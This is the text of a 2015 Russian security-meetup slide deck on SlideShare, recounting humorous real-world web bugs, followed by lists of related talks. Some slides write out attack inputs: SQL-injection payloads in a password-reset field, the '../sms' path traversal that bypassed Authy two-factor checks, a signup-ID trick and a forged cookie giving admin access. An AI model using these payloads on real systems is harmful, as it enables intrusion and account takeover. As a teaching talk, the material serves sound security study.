SlideShare ist ein Scribd-Unternehmen logo

Bo0oM - Ты такой смешной XD #securitymeetup

Als PPS, PDF herunterladen
Дмитрий Бумов
Дмитрий Бумов

09.04.2015 #securitymeetup

Technologie
1 von 34
learnppt.com LOGO Ты такой смешной!!!1!))00) Весёлые (и не очень) баги и взломы 9 апреля 2015 #securitymeetup
ПРЕДУПРЕЖДЕНИЕ! Последующие слайды содержат сцены сексуального насилия над web-приложениями и програмным обеспечением различной тематики и направленности. Копирование и воспроизведение векторов атак карается 272 статьей Уголовного кодекса Российской Федерации, хотя такие экземпляры ещё и найти надо, так что можете попробовать, но если что, я вас предупреждал! Ну вы поняли...
3 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO Время интересных ИСТОРИЙ #securitymeetup
4 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @isox_xx #securitymeetup
5 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO GET /shutdown/ HTTP/1.1 Host: up-fotki.yandex.ru User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:28.0) Gecko/20100101 Firefox/28.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://fotki.yandex.ru/upload?force=js Cервак выключается... https://up-fotki.yandex.ru/shutdown/ @isox_xx #securitymeetup
6 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @isox_xx #securitymeetup
7 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @isox_xx #securitymeetup
8 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @isox_xx #securitymeetup
9 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @webpentest POST /signup/claim/id*/ HTTP/1.1 ... CSRF=bLJtKc0uLGGWoBkKhNMJCXGt0mhlhHiw&email=email@example.com&p assword=test&login=MyLogin POST /signup/claim/WMkiheTT-8kRslImVLWMVw/ HTTP/1.1 ... CSRF=bLJtKc0uLGGWoBkKhNMJCXGt0mhlhHiw&email=email@example.com&p assword=test&login=Administrator Регистрация курильщика: Регистрация здорового человека: *Где id - уникальный идентификатор, который берётся... На странице существующего пользователя #securitymeetup
10 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @webpentest Уже существует пользователь? Не беда! В итоге перекидывает в админку сервиса с "свежереганным" логином. #securitymeetup
11 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @4rt3m #securitymeetup
12 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @4rt3m #securitymeetup
13 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO #securitymeetup
14 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @fb1h2s @msecnet #securitymeetup
15 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @homakov #securitymeetup
16 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @homakov 1. Вводим ../sms в поле токена 2. Клиент кодирует это как ..%2fsms и делает запрос на api.authy.com/protected/json/verify/..%2fsms/authy_id 3. path_traversal декодирует полученный URL на раннем этапе в api.authy.com/protected/json/verify/../sms/authy_id, делит все по / и удаляет директорию /verify 4. Теперь само приложение получает модифицированный путь api.authy.com/protected/json/sms/authy_id который посылает СМС жертве и возвращает 200 статус и ответом {«success»:true,«message»:«SMS token was sent», «cellphone»:"+1-XXX-XXX-XX85"} 5. Наш клиент который хотел проверить наш токен видит 200 статус и делает вывод что токен правильный. Даже если используется кастомная реализация API, клиент скорее всего ищет success=true что в нашем ответе тоже присутствует. Попросту говоря введя ../sms в поле токена можно было обойти двух факторную аутенфикацию на всех сайтах использующих Authy. #securitymeetup
17 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO #securitymeetup
18 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO #securitymeetup Один из примеров фикса...
19 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @fgkm_ Когда имя пользователя в url #securitymeetup
20 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @Black2Fan RCE В ФОРМИРОВАНИИ CSS ФАЙЛА!!!!!11!!!!!адин!! #securitymeetup
21 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO Root, пароль для слабаков! #securitymeetup
22 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @d90andrew Восстановление пароля. Поле для email'а: my@gmail.com' and 'a'='a# - письмо приходит my@gmail.com' and 'a'='b# - не отправляется my@gmail.com' union select 1,2,3,4,5,6# #securitymeetup
23 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @d90andrew my@gmail.com' union select 1,2,3,concat_ws(0x3a,version(),database()),5,6# #securitymeetup
24 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @d90andrew Пара часов и база пользователей в кармане! Точнее в почте... #securitymeetup
25 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO #securitymeetup
26 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO ЧОЭТА? #securitymeetup
27 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO @asintsov Привет, сервак, как жизнь? Как дети? Форкаешься еще? Если ты ADMIN, то хэш твоего пароля XXXXXXX! Ты уверен, что у твоего пароля такой хэш? Ну ты скажешь! Конечно! У меня такой же хэш и получился! Админ я или кто, по-твоему! Ну раз Админ, то проходи! Ну привет, клиентик. Ты сам-то чьих будешь? Ну как же это? Админ я, Админ! Соединение установлено. Текущий пользователь: ADMIN Самая крутая СУБД в мире - OpenEdge #securitymeetup
28 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO ЧТОЧТО ЗАЗА херняхерня туттут ПРОИСХОДИТ??ПРОИСХОДИТ?? #securitymeetup
29 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO Были подобраны файлы и папки: • /image/ • /css/ • /js/ • /index.php • /login.php • /logout.php #securitymeetup
30 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO GET /logout.php HTTP/1.1 Host: *******.ru HTTP/1.1 200 Ok Server: nginx Date: Dec, 29 Apr 1970 13:14:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close Cache-Control: no-cache,no-store,max-age=0,must-revalidate Set-Cookie: 7ed93bc3576665339e899f356890fa5e=false; Path=/ Запрос: Ответ: #securitymeetup
31 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO GET /index.php HTTP/1.1 Host: *******.ru Cookie: 7ed93bc3576665339e899f356890fa5e=true Запрос: Добро пожаловать в панель администратора! ииииииииии... #securitymeetup
32 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO А бывает наоборот... #securitymeetup
33 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO #securitymeetup Bo0oM @i_bo0om Пишу лучше чем говорю (инфа сотка)
34 Questions & feedback? Email me – dave@learnppt.com More PowerPoint resources and downloads available at learnppt.com.learnppt.com LOGO #securitymeetup СДАЛСДАЛ ИГЭИГЭ ??http://goo.gl/TxxCi3

Empfohlen

Дмитрий Bo0oM Бумов, Security Meetup 9 апреля, Mail.Ru Group
Дмитрий Bo0oM Бумов, Security Meetup 9 апреля, Mail.Ru GroupДмитрий Bo0oM Бумов, Security Meetup 9 апреля, Mail.Ru Group
Дмитрий Bo0oM Бумов, Security Meetup 9 апреля, Mail.Ru GroupMail.ru Group
 
DEFCON и развитие информационной безопасности в стране. (Олжас Сатиев)
DEFCON и развитие информационной безопасности в стране. (Олжас Сатиев) DEFCON и развитие информационной безопасности в стране. (Олжас Сатиев)
DEFCON и развитие информационной безопасности в стране. (Олжас Сатиев) Kristina Pomozova
 
Безопасный кодинг. Хакеры нас не достанут (Максим “Arrim” Попов)
Безопасный кодинг. Хакеры нас не достанут (Максим “Arrim” Попов)Безопасный кодинг. Хакеры нас не достанут (Максим “Arrim” Попов)
Безопасный кодинг. Хакеры нас не достанут (Максим “Arrim” Попов)Kristina Pomozova
 
Полезные железки или к взлому GSM сетей готов! (Ербол)
Полезные железки или к взлому GSM сетей готов! (Ербол)Полезные железки или к взлому GSM сетей готов! (Ербол)
Полезные железки или к взлому GSM сетей готов! (Ербол)Kristina Pomozova
 
Bo0oM - Deanonymization and total espionage (ZeroNights, 2014)
Bo0oM - Deanonymization and total espionage (ZeroNights, 2014)Bo0oM - Deanonymization and total espionage (ZeroNights, 2014)
Bo0oM - Deanonymization and total espionage (ZeroNights, 2014)Дмитрий Бумов
 
Как парализовать государство за 60 минут. (Сатиев Олжас)
Как парализовать государство за 60 минут. (Сатиев Олжас)Как парализовать государство за 60 минут. (Сатиев Олжас)
Как парализовать государство за 60 минут. (Сатиев Олжас)Kristina Pomozova
 
Исследование Viber Атакуем пользователя через популярный мессенджер (Игорь al...
Исследование Viber Атакуем пользователя через популярный мессенджер (Игорь al...Исследование Viber Атакуем пользователя через популярный мессенджер (Игорь al...
Исследование Viber Атакуем пользователя через популярный мессенджер (Игорь al...Kristina Pomozova
 
Взлом Wi-Fi, теперь это мое! Теория и практические примеры по взлому Wi-Fi се...
Взлом Wi-Fi, теперь это мое! Теория и практические примеры по взлому Wi-Fi се...Взлом Wi-Fi, теперь это мое! Теория и практические примеры по взлому Wi-Fi се...
Взлом Wi-Fi, теперь это мое! Теория и практические примеры по взлому Wi-Fi се...Kristina Pomozova
 

Empfohlen

Дмитрий Bo0oM Бумов, Security Meetup 9 апреля, Mail.Ru Group
Дмитрий Bo0oM Бумов, Security Meetup 9 апреля, Mail.Ru GroupДмитрий Bo0oM Бумов, Security Meetup 9 апреля, Mail.Ru Group
Дмитрий Bo0oM Бумов, Security Meetup 9 апреля, Mail.Ru GroupMail.ru Group
 
DEFCON и развитие информационной безопасности в стране. (Олжас Сатиев)
DEFCON и развитие информационной безопасности в стране. (Олжас Сатиев) DEFCON и развитие информационной безопасности в стране. (Олжас Сатиев)
DEFCON и развитие информационной безопасности в стране. (Олжас Сатиев) Kristina Pomozova
 
Безопасный кодинг. Хакеры нас не достанут (Максим “Arrim” Попов)
Безопасный кодинг. Хакеры нас не достанут (Максим “Arrim” Попов)Безопасный кодинг. Хакеры нас не достанут (Максим “Arrim” Попов)
Безопасный кодинг. Хакеры нас не достанут (Максим “Arrim” Попов)Kristina Pomozova
 
Полезные железки или к взлому GSM сетей готов! (Ербол)
Полезные железки или к взлому GSM сетей готов! (Ербол)Полезные железки или к взлому GSM сетей готов! (Ербол)
Полезные железки или к взлому GSM сетей готов! (Ербол)Kristina Pomozova
 
Bo0oM - Deanonymization and total espionage (ZeroNights, 2014)
Bo0oM - Deanonymization and total espionage (ZeroNights, 2014)Bo0oM - Deanonymization and total espionage (ZeroNights, 2014)
Bo0oM - Deanonymization and total espionage (ZeroNights, 2014)Дмитрий Бумов
 
Как парализовать государство за 60 минут. (Сатиев Олжас)
Как парализовать государство за 60 минут. (Сатиев Олжас)Как парализовать государство за 60 минут. (Сатиев Олжас)
Как парализовать государство за 60 минут. (Сатиев Олжас)Kristina Pomozova
 
Исследование Viber Атакуем пользователя через популярный мессенджер (Игорь al...
Исследование Viber Атакуем пользователя через популярный мессенджер (Игорь al...Исследование Viber Атакуем пользователя через популярный мессенджер (Игорь al...
Исследование Viber Атакуем пользователя через популярный мессенджер (Игорь al...Kristina Pomozova
 
Взлом Wi-Fi, теперь это мое! Теория и практические примеры по взлому Wi-Fi се...
Взлом Wi-Fi, теперь это мое! Теория и практические примеры по взлому Wi-Fi се...Взлом Wi-Fi, теперь это мое! Теория и практические примеры по взлому Wi-Fi се...
Взлом Wi-Fi, теперь это мое! Теория и практические примеры по взлому Wi-Fi се...Kristina Pomozova
 
Находим и эксплуатируем уязвимости. Теория и практические примеры уязвимых ре...
Находим и эксплуатируем уязвимости. Теория и практические примеры уязвимых ре...Находим и эксплуатируем уязвимости. Теория и практические примеры уязвимых ре...
Находим и эксплуатируем уязвимости. Теория и практические примеры уязвимых ре...Kristina Pomozova
 
Чем опасны USB носители (Торгаев Айдын [righthearted])
Чем опасны USB носители (Торгаев Айдын [righthearted])Чем опасны USB носители (Торгаев Айдын [righthearted])
Чем опасны USB носители (Торгаев Айдын [righthearted])Kristina Pomozova
 
Разведка боем, правильный сбор внешнего сетевого периметра (Антон Bo0oM Лопан...
Разведка боем, правильный сбор внешнего сетевого периметра (Антон Bo0oM Лопан...Разведка боем, правильный сбор внешнего сетевого периметра (Антон Bo0oM Лопан...
Разведка боем, правильный сбор внешнего сетевого периметра (Антон Bo0oM Лопан...Kristina Pomozova
 
DEFCON и развитие информационной безопасности в стране. (Олжас Сатиев)
DEFCON и развитие информационной безопасности в стране. (Олжас Сатиев) DEFCON и развитие информационной безопасности в стране. (Олжас Сатиев)
DEFCON и развитие информационной безопасности в стране. (Олжас Сатиев) defcon_kz
 
БАЗОВАЯ ЭКСПЛУАТАЦИЯ ПЕРЕПОЛНЕНИЯ БУФЕРА (ДАНИЯР D4K3)
БАЗОВАЯ ЭКСПЛУАТАЦИЯ ПЕРЕПОЛНЕНИЯ БУФЕРА (ДАНИЯР D4K3)БАЗОВАЯ ЭКСПЛУАТАЦИЯ ПЕРЕПОЛНЕНИЯ БУФЕРА (ДАНИЯР D4K3)
БАЗОВАЯ ЭКСПЛУАТАЦИЯ ПЕРЕПОЛНЕНИЯ БУФЕРА (ДАНИЯР D4K3)defcon_kz
 
Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...
Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...
Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...Дмитрий Бумов
 
flag{жив_ли_CTF_в _Казахстане?} (@fuzzyf10w && @n0z3r0) CTF Team: b1n4ry4rms
flag{жив_ли_CTF_в _Казахстане?} (@fuzzyf10w && @n0z3r0) CTF Team: b1n4ry4rmsflag{жив_ли_CTF_в _Казахстане?} (@fuzzyf10w && @n0z3r0) CTF Team: b1n4ry4rms
flag{жив_ли_CTF_в _Казахстане?} (@fuzzyf10w && @n0z3r0) CTF Team: b1n4ry4rmsdefcon_kz
 
Безопасный кодинг. Хакеры нас не достанут (Максим “Arrim” Попов)
Безопасный кодинг. Хакеры нас не достанут (Максим “Arrim” Попов)Безопасный кодинг. Хакеры нас не достанут (Максим “Arrim” Попов)
Безопасный кодинг. Хакеры нас не достанут (Максим “Arrim” Попов)defcon_kz
 
Добро пожаловать в практическую безопасность (Сергей Белов)
Добро пожаловать в практическую безопасность (Сергей Белов)Добро пожаловать в практическую безопасность (Сергей Белов)
Добро пожаловать в практическую безопасность (Сергей Белов)defcon_kz
 
ХАРДЕНИНГ (Аринов Ильяс (determination))
ХАРДЕНИНГ (Аринов Ильяс (determination))ХАРДЕНИНГ (Аринов Ильяс (determination))
ХАРДЕНИНГ (Аринов Ильяс (determination))defcon_kz
 
Фишинг (Стекольников Илья)
Фишинг (Стекольников Илья)Фишинг (Стекольников Илья)
Фишинг (Стекольников Илья)defcon_kz
 
5 urok
5 urok5 urok
5 urokNik Krutov
 
Плюшки&nbspда&nbspфишки&nbspили&nbspЖизнь&nbspЗамечтаельных&nbspСистем&nbspДи...
Плюшки&nbspда&nbspфишки&nbspили&nbspЖизнь&nbspЗамечтаельных&nbspСистем&nbspДи...Плюшки&nbspда&nbspфишки&nbspили&nbspЖизнь&nbspЗамечтаельных&nbspСистем&nbspДи...
Плюшки&nbspда&nbspфишки&nbspили&nbspЖизнь&nbspЗамечтаельных&nbspСистем&nbspДи...Interkrok
 
Опыт разработки SEO софта на примере FastTrust и ComparseR
Опыт разработки SEO софта на примере FastTrust и ComparseRОпыт разработки SEO софта на примере FastTrust и ComparseR
Опыт разработки SEO софта на примере FastTrust и ComparseRАлександр Алаев
 
бесплатный курс по ускоренному созданию сайта для интернет
бесплатный курс по ускоренному созданию сайта для интернет бесплатный курс по ускоренному созданию сайта для интернет
бесплатный курс по ускоренному созданию сайта для интернетОльга Таран
 
QA Fest 2016. Алексей Виноградов. Цель тестирования. А на самом деле?
QA Fest 2016. Алексей Виноградов. Цель тестирования. А на самом деле?QA Fest 2016. Алексей Виноградов. Цель тестирования. А на самом деле?
QA Fest 2016. Алексей Виноградов. Цель тестирования. А на самом деле?QAFest
 
Харланова Наталья портфолио - интервью Светланы Терехиной и Алексея Еланцева...
Харланова Наталья портфолио - интервью Светланы Терехиной и Алексея Еланцева...Харланова Наталья портфолио - интервью Светланы Терехиной и Алексея Еланцева...
Харланова Наталья портфолио - интервью Светланы Терехиной и Алексея Еланцева...Наталья Харланова
 
как работать с Youtube
как работать с Youtube как работать с Youtube
как работать с Youtube Академия интернет-маркетинга «WebPromoExperts»
 
Продукт или проект - Александр Борисов Dev2Dev v1.5 23.11.2014
Продукт или проект - Александр Борисов Dev2Dev v1.5 23.11.2014Продукт или проект - Александр Борисов Dev2Dev v1.5 23.11.2014
Продукт или проект - Александр Борисов Dev2Dev v1.5 23.11.2014Dev2Dev
 
Ulect brief rus1
Ulect brief rus1Ulect brief rus1
Ulect brief rus1Mikhail Shagiev
 
Сумма технологий: +5 к скорости разработки
Сумма технологий: +5 к скорости разработкиСумма технологий: +5 к скорости разработки
Сумма технологий: +5 к скорости разработкиAstra Media Group, Russia
 
ТЗ на сайт
ТЗ на сайтТЗ на сайт
ТЗ на сайтKaterina Saprina
 

Weitere ähnliche Inhalte

Andere mochten auch

Находим и эксплуатируем уязвимости. Теория и практические примеры уязвимых ре...
Находим и эксплуатируем уязвимости. Теория и практические примеры уязвимых ре...Находим и эксплуатируем уязвимости. Теория и практические примеры уязвимых ре...
Находим и эксплуатируем уязвимости. Теория и практические примеры уязвимых ре...Kristina Pomozova
 
Чем опасны USB носители (Торгаев Айдын [righthearted])
Чем опасны USB носители (Торгаев Айдын [righthearted])Чем опасны USB носители (Торгаев Айдын [righthearted])
Чем опасны USB носители (Торгаев Айдын [righthearted])Kristina Pomozova
 
Разведка боем, правильный сбор внешнего сетевого периметра (Антон Bo0oM Лопан...
Разведка боем, правильный сбор внешнего сетевого периметра (Антон Bo0oM Лопан...Разведка боем, правильный сбор внешнего сетевого периметра (Антон Bo0oM Лопан...
Разведка боем, правильный сбор внешнего сетевого периметра (Антон Bo0oM Лопан...Kristina Pomozova
 
DEFCON и развитие информационной безопасности в стране. (Олжас Сатиев)
DEFCON и развитие информационной безопасности в стране. (Олжас Сатиев) DEFCON и развитие информационной безопасности в стране. (Олжас Сатиев)
DEFCON и развитие информационной безопасности в стране. (Олжас Сатиев) defcon_kz
 
БАЗОВАЯ ЭКСПЛУАТАЦИЯ ПЕРЕПОЛНЕНИЯ БУФЕРА (ДАНИЯР D4K3)
БАЗОВАЯ ЭКСПЛУАТАЦИЯ ПЕРЕПОЛНЕНИЯ БУФЕРА (ДАНИЯР D4K3)БАЗОВАЯ ЭКСПЛУАТАЦИЯ ПЕРЕПОЛНЕНИЯ БУФЕРА (ДАНИЯР D4K3)
БАЗОВАЯ ЭКСПЛУАТАЦИЯ ПЕРЕПОЛНЕНИЯ БУФЕРА (ДАНИЯР D4K3)defcon_kz
 
Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...
Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...
Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...Дмитрий Бумов
 
flag{жив_ли_CTF_в _Казахстане?} (@fuzzyf10w && @n0z3r0) CTF Team: b1n4ry4rms
flag{жив_ли_CTF_в _Казахстане?} (@fuzzyf10w && @n0z3r0) CTF Team: b1n4ry4rmsflag{жив_ли_CTF_в _Казахстане?} (@fuzzyf10w && @n0z3r0) CTF Team: b1n4ry4rms
flag{жив_ли_CTF_в _Казахстане?} (@fuzzyf10w && @n0z3r0) CTF Team: b1n4ry4rmsdefcon_kz
 
Безопасный кодинг. Хакеры нас не достанут (Максим “Arrim” Попов)
Безопасный кодинг. Хакеры нас не достанут (Максим “Arrim” Попов)Безопасный кодинг. Хакеры нас не достанут (Максим “Arrim” Попов)
Безопасный кодинг. Хакеры нас не достанут (Максим “Arrim” Попов)defcon_kz
 
Добро пожаловать в практическую безопасность (Сергей Белов)
Добро пожаловать в практическую безопасность (Сергей Белов)Добро пожаловать в практическую безопасность (Сергей Белов)
Добро пожаловать в практическую безопасность (Сергей Белов)defcon_kz
 
ХАРДЕНИНГ (Аринов Ильяс (determination))
ХАРДЕНИНГ (Аринов Ильяс (determination))ХАРДЕНИНГ (Аринов Ильяс (determination))
ХАРДЕНИНГ (Аринов Ильяс (determination))defcon_kz
 
Фишинг (Стекольников Илья)
Фишинг (Стекольников Илья)Фишинг (Стекольников Илья)
Фишинг (Стекольников Илья)defcon_kz
 

Andere mochten auch (11)

Находим и эксплуатируем уязвимости. Теория и практические примеры уязвимых ре...
Находим и эксплуатируем уязвимости. Теория и практические примеры уязвимых ре...Находим и эксплуатируем уязвимости. Теория и практические примеры уязвимых ре...
Находим и эксплуатируем уязвимости. Теория и практические примеры уязвимых ре...
 
Чем опасны USB носители (Торгаев Айдын [righthearted])
Чем опасны USB носители (Торгаев Айдын [righthearted])Чем опасны USB носители (Торгаев Айдын [righthearted])
Чем опасны USB носители (Торгаев Айдын [righthearted])
 
Разведка боем, правильный сбор внешнего сетевого периметра (Антон Bo0oM Лопан...
Разведка боем, правильный сбор внешнего сетевого периметра (Антон Bo0oM Лопан...Разведка боем, правильный сбор внешнего сетевого периметра (Антон Bo0oM Лопан...
Разведка боем, правильный сбор внешнего сетевого периметра (Антон Bo0oM Лопан...
 
DEFCON и развитие информационной безопасности в стране. (Олжас Сатиев)
DEFCON и развитие информационной безопасности в стране. (Олжас Сатиев) DEFCON и развитие информационной безопасности в стране. (Олжас Сатиев)
DEFCON и развитие информационной безопасности в стране. (Олжас Сатиев)
 
БАЗОВАЯ ЭКСПЛУАТАЦИЯ ПЕРЕПОЛНЕНИЯ БУФЕРА (ДАНИЯР D4K3)
БАЗОВАЯ ЭКСПЛУАТАЦИЯ ПЕРЕПОЛНЕНИЯ БУФЕРА (ДАНИЯР D4K3)БАЗОВАЯ ЭКСПЛУАТАЦИЯ ПЕРЕПОЛНЕНИЯ БУФЕРА (ДАНИЯР D4K3)
БАЗОВАЯ ЭКСПЛУАТАЦИЯ ПЕРЕПОЛНЕНИЯ БУФЕРА (ДАНИЯР D4K3)
 
Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...
Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...
Zeronights 2016 | A blow under the belt. How to avoid WAF/IPS/DLP | Удар ниже...
 
flag{жив_ли_CTF_в _Казахстане?} (@fuzzyf10w && @n0z3r0) CTF Team: b1n4ry4rms
flag{жив_ли_CTF_в _Казахстане?} (@fuzzyf10w && @n0z3r0) CTF Team: b1n4ry4rmsflag{жив_ли_CTF_в _Казахстане?} (@fuzzyf10w && @n0z3r0) CTF Team: b1n4ry4rms
flag{жив_ли_CTF_в _Казахстане?} (@fuzzyf10w && @n0z3r0) CTF Team: b1n4ry4rms
 
Безопасный кодинг. Хакеры нас не достанут (Максим “Arrim” Попов)
Безопасный кодинг. Хакеры нас не достанут (Максим “Arrim” Попов)Безопасный кодинг. Хакеры нас не достанут (Максим “Arrim” Попов)
Безопасный кодинг. Хакеры нас не достанут (Максим “Arrim” Попов)
 
Добро пожаловать в практическую безопасность (Сергей Белов)
Добро пожаловать в практическую безопасность (Сергей Белов)Добро пожаловать в практическую безопасность (Сергей Белов)
Добро пожаловать в практическую безопасность (Сергей Белов)
 
ХАРДЕНИНГ (Аринов Ильяс (determination))
ХАРДЕНИНГ (Аринов Ильяс (determination))ХАРДЕНИНГ (Аринов Ильяс (determination))
ХАРДЕНИНГ (Аринов Ильяс (determination))
 
Фишинг (Стекольников Илья)
Фишинг (Стекольников Илья)Фишинг (Стекольников Илья)
Фишинг (Стекольников Илья)
 

Ähnlich wie Bo0oM - Ты такой смешной XD #securitymeetup

Плюшки&nbspда&nbspфишки&nbspили&nbspЖизнь&nbspЗамечтаельных&nbspСистем&nbspДи...
Плюшки&nbspда&nbspфишки&nbspили&nbspЖизнь&nbspЗамечтаельных&nbspСистем&nbspДи...Плюшки&nbspда&nbspфишки&nbspили&nbspЖизнь&nbspЗамечтаельных&nbspСистем&nbspДи...
Плюшки&nbspда&nbspфишки&nbspили&nbspЖизнь&nbspЗамечтаельных&nbspСистем&nbspДи...Interkrok
 
Опыт разработки SEO софта на примере FastTrust и ComparseR
Опыт разработки SEO софта на примере FastTrust и ComparseRОпыт разработки SEO софта на примере FastTrust и ComparseR
Опыт разработки SEO софта на примере FastTrust и ComparseRАлександр Алаев
 
бесплатный курс по ускоренному созданию сайта для интернет
бесплатный курс по ускоренному созданию сайта для интернет бесплатный курс по ускоренному созданию сайта для интернет
бесплатный курс по ускоренному созданию сайта для интернетОльга Таран
 
QA Fest 2016. Алексей Виноградов. Цель тестирования. А на самом деле?
QA Fest 2016. Алексей Виноградов. Цель тестирования. А на самом деле?QA Fest 2016. Алексей Виноградов. Цель тестирования. А на самом деле?
QA Fest 2016. Алексей Виноградов. Цель тестирования. А на самом деле?QAFest
 
Харланова Наталья портфолио - интервью Светланы Терехиной и Алексея Еланцева...
Харланова Наталья портфолио - интервью Светланы Терехиной и Алексея Еланцева...Харланова Наталья портфолио - интервью Светланы Терехиной и Алексея Еланцева...
Харланова Наталья портфолио - интервью Светланы Терехиной и Алексея Еланцева...Наталья Харланова
 
Продукт или проект - Александр Борисов Dev2Dev v1.5 23.11.2014
Продукт или проект - Александр Борисов Dev2Dev v1.5 23.11.2014Продукт или проект - Александр Борисов Dev2Dev v1.5 23.11.2014
Продукт или проект - Александр Борисов Dev2Dev v1.5 23.11.2014Dev2Dev
 
Сумма технологий: +5 к скорости разработки
Сумма технологий: +5 к скорости разработкиСумма технологий: +5 к скорости разработки
Сумма технологий: +5 к скорости разработкиAstra Media Group, Russia
 
Trening modul1-webinar5
Trening modul1-webinar5Trening modul1-webinar5
Trening modul1-webinar5olgaoov
 
Подготовка ТЗ на электронные курсы. Колоденский А. 26.11.09
Подготовка ТЗ на электронные курсы. Колоденский А. 26.11.09Подготовка ТЗ на электронные курсы. Колоденский А. 26.11.09
Подготовка ТЗ на электронные курсы. Колоденский А. 26.11.09Сообщество eLearning PRO
 
Инструменты образовательного бизнеса
Инструменты образовательного бизнесаИнструменты образовательного бизнеса
Инструменты образовательного бизнесаAlex Krol
 
eLearningSoft - JoomlaLMs
eLearningSoft - JoomlaLMseLearningSoft - JoomlaLMs
eLearningSoft - JoomlaLMseLearninfSoft
 
Компетенции внутренних разработчиков курсов_Тихомирова Е.В. 14.10.10
Компетенции внутренних разработчиков курсов_Тихомирова Е.В. 14.10.10Компетенции внутренних разработчиков курсов_Тихомирова Е.В. 14.10.10
Компетенции внутренних разработчиков курсов_Тихомирова Е.В. 14.10.10Сообщество eLearning PRO
 
Slideshare presentation at askcap
Slideshare presentation at askcapSlideshare presentation at askcap
Slideshare presentation at askcapaskcap
 
SecDevOps. Разработка, DevOps и безопасность.
SecDevOps. Разработка, DevOps и безопасность.SecDevOps. Разработка, DevOps и безопасность.
SecDevOps. Разработка, DevOps и безопасность.Valery Boronin
 

Ähnlich wie Bo0oM - Ты такой смешной XD #securitymeetup (20)

5 urok
5 urok5 urok
5 urok
 
Плюшки&nbspда&nbspфишки&nbspили&nbspЖизнь&nbspЗамечтаельных&nbspСистем&nbspДи...
Плюшки&nbspда&nbspфишки&nbspили&nbspЖизнь&nbspЗамечтаельных&nbspСистем&nbspДи...Плюшки&nbspда&nbspфишки&nbspили&nbspЖизнь&nbspЗамечтаельных&nbspСистем&nbspДи...
Плюшки&nbspда&nbspфишки&nbspили&nbspЖизнь&nbspЗамечтаельных&nbspСистем&nbspДи...
 
Опыт разработки SEO софта на примере FastTrust и ComparseR
Опыт разработки SEO софта на примере FastTrust и ComparseRОпыт разработки SEO софта на примере FastTrust и ComparseR
Опыт разработки SEO софта на примере FastTrust и ComparseR
 
бесплатный курс по ускоренному созданию сайта для интернет
